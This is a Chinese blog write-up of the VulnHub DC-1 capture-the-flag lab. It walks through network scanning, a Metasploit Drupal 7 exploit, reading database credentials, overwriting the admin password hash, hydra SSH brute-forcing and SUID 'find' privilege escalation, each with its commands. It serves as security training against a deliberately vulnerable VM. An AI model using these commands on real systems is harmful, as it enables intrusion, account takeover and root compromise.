DC-1靶机

本文详细描述了一次渗透测试的过程,从设置虚拟机环境,到使用nmap和arp-scan进行网络扫描,发现靶机DC-1并识别其开放端口。接着,利用DrupalCMS的漏洞,通过Metasploit进行攻击,获取Webshell。进一步在数据库中寻找用户信息,修改密码,实现网站登录。最终,通过权限提升和SSH登录,找到并读取了最终的flag文件。
摘要由CSDN通过智能技术生成

一、搭建环境

  1. 下载靶机:https://download.vulnhub.com/dc/DC-1.zip

  1. 解压靶机得到一个.ova文件

  1. 利用虚拟机打开文件,将网卡设置成NAT模式,启动虚拟机

二、渗透过程

信息收集
  1. 打开DC-1,需要登录账号和密码

  1. 打开kali虚拟机,将kali网卡设置成NAT(与DC-1在同一网段上)

  1. 利用nmap扫描DC-1的IP地址

nmap -sP 192.168.XX.0/24

在利用arp-scan 进行扫描

arp-scan -l -I eth1 
#-l 会扫描当前网络  -I 会扫描指定接口名称的网络(如果只有一个网卡可以不跟此参数)

此时发现DC-1靶机IP为192.168.88.164

  1. 利用nmap对DC-1进行端口扫描,发现开放了80、22端口,

nmap -sV -P 192.168.XXX.XXX

那么直接访问80,发现需要登录名和密码

看见网页CMS是Drupal,在用插件查看网站信息

CMS:Drupal 7、PHP:5.4.45、Apache:2.2.22、OS:Debian

漏洞查找

使用工具Metasploit查找CMS为drupal 7的漏洞

漏洞利用
  1. 使用上面的exp,输入use 0 ,查看exp的具体配置信息

  1. 看到RHOST提示yes需要配置,配置为DC-1的IP地址:set rhosts 192.168.88.164

  1. run一下,等一会,在输入shell,制作反弹shell就好了

  1. 这个命令行不是太好用,可以使用python获取交互shell

python -c 'import pty;pty.spawn("/bin/bash")'
  1. 查看到目录下面有一个flag1,查看文件(每一个CMS都有一个配置文件,你也一样),提示我们需要去找配置文件

  1. 最后在sites/default路径下找到文件名为settings.php的就是配置文件,看到flag2、数据库用户密码信息

  1. 看到数据库只能本地连接,尝试连接数据库,成功连入数据库,查看库和表

mysql -udbuser -pR0ck3t;
show databases;
use drupaldb;
show tables;
  1. 根据前面网页需要登录名和密码,那就在数据库里面找找用户和密码,但是看到密码应该是被加密了

select * from users;
  1. 想办法修改成我们知道的密码,那么就需要找到加密文件,然后利用加密文件生成我们知道的密码,在修改数据库admin用户密码

    回到网站根目录输入下面命令得到加密后的hash值,拷贝hash到数据库进行修改

php /var/www/scripts/password-hash.sh 123456

进入数据库,修改密码

update users set pass="$S$D1ZElyzg2fav6dLROoZ90cRqIhikMO282lHI7kxpuM/t2/kGxOyc" where uid=1;
  1. 拿着admin和123456去网站登录,成功登录

在网页上查找到flag3

  1. 根据flag3提示passwd和shadow,那么查看这两个文件,passwd下面有一个flag4用户并且有/bin/bash,而shadow文件提示权限不够

那么查看/home下面确实有一个flag4用户,目录下面有个flag4.txt文件,看到提示root

  1. 再尝试find查找一下系统里面的flag,看到root下面有个thefinalflag.txt文件,此时为网页用户权限,发现权限不够,需要提权,就用flag4用户进行提权

find / -name "*flag*.txt" 2>/dev/null

此时想到前面扫描出来一个22端口,通过使用hydra进行爆破,爆出密码orange,尝试ssh登录

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.88.164
  1. 需要用到SUID提权,利用find命令找查具有SUID权限的可执行二进制文件

find / -perm -u=s -type f 2>/dev/null

看到find就可以,直接提权,查看root文件,拿到最后flag

find -exec /bin/sh \;

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值